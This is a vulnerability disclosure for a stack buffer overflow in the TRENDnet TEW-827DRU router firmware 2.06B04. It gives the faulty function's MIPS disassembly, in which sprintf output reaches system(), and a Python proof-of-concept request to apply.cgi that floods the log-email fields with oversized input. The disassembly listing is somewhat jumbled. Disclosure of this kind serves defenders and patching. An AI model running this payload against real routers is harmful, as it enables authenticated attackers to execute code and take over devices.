# TEW-827DRU

#### Firmware version

```
TEW-827DRU firmware: 2.06B04
```

## Description

TRENDnet TEW-827DRU with firmware up to and including 2.06B04 contains a stack-based buffer overflow in the ssi binary. The overflow allows an authenticated user to execute arbitrary code by POSTing to apply.cgi via the action send\_log\_email with the a sufficiently long key log\_email\_sender, log\_email\_port, model\_name and log\_email\_server.

#### **Detial**

```
The bug in function: 0x43B0BC, binary: www/cgi/ssi
The parameter 'auth_acname' or 'auth_passwd' or 'log_email_port' or
'log_email_sender' or 'model_name' or 'log_email_server' pass to sprintf
```

```
addiu $a1, $v0, (aSFSASPS - 0x4C0000) # "%s -F %s -A %s -P %s"
0043B334
                        addiu $a0, $fp, 0x3E0+var_310 # s
addiu $v1, $fp, 0x3E0+var_310
0043B338
0043B33C
                        addiu $v0, $fp, 0x3E0+var_110
0043B340
                        addiu $a2, $fp, 0x3E0+var_210
0043B344
0043B348
                        SW
                                 $a2, 0x3E0+var_3D0($sp)
0043B34C
                        addiu $a2, $fp, 0x3E0+var_190
0043B350
                         SW
                                 $a2, 0x3E0+var_3CC($sp)
0043B354
                         move
                                 $a2, $v1
0043B358
                                 $a3, $v0
                         move
                                 $v0, sprintf
0043B35C
                        la
0043B360
                        nop
                                 $t9, $v0
0043B364
                         move
0043B368
                         jalr
                                $t9; sprintf
0043B36C
                         nop
0043B370
                                $gp, 0x3E0+var_3C8($fp)
                         lw
0043B374
0043B374 loc_43B374:
                                                  # CODE XREF: sub_43B0BC+2681j
0043B374
                         addiu $v0, $fp, 0x3E0+var_310
0043B378
                         move
                                 $a0, $v0
                                                  # command
0043B37C
                         la
                                 $v0, system
0043B380
                         nop
0043B384
                                $t9, $v0
                         move
0043B388
                         jalr
                                $t9 ; system
```

## **Send Packege**

```
payload = 'A'*0x2f0
scommand = bytes(payload, 'utf8')
data8 = {
    # b'ccp_act': b'set',
    b'action': b'send_log_email',
    b'auth_active': b'0',
    b'log_email_from': b'abc@gmail.com' + scommand,
    b'auth_acname': b'a',
    b'auth_passwd': b'12345',
```

```
b'log_email_server': b'a' + scommand,
b'log_email_port': scommand,
b'log_email_sender': b'xxx@gmail.com' + scommand,
b'model_name': b'abc' + scommand,
```